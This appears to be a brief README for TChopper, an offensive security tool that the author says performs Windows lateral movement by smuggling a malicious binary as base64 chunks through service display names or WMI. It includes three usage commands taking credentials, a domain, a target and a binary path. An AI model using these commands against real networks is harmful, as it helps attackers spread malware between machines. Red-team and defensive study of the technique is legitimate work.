conduct lateral movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine
New technique I have discovered recently and give it a nickname (Chop chop) to perform lateral movement using windows services display name and WMI by smuggling the malicious binary as base64 chunks and automate the process using the TChopper tool.
while if you are conducting lateral movment using WMI technique you can also use Chopper to do that
#chop chop mode
chopper.exe -s -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
# chop chop done
chopper.exe -m -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
# use WMI to smuggle
chopper.exe -w -u DOMAIN\USERNAME -p PASSWORD -t MACHINE -f LOCALBINARYPATH
i create offsec tools for open-source community, show your support https://paypal.me/0xsp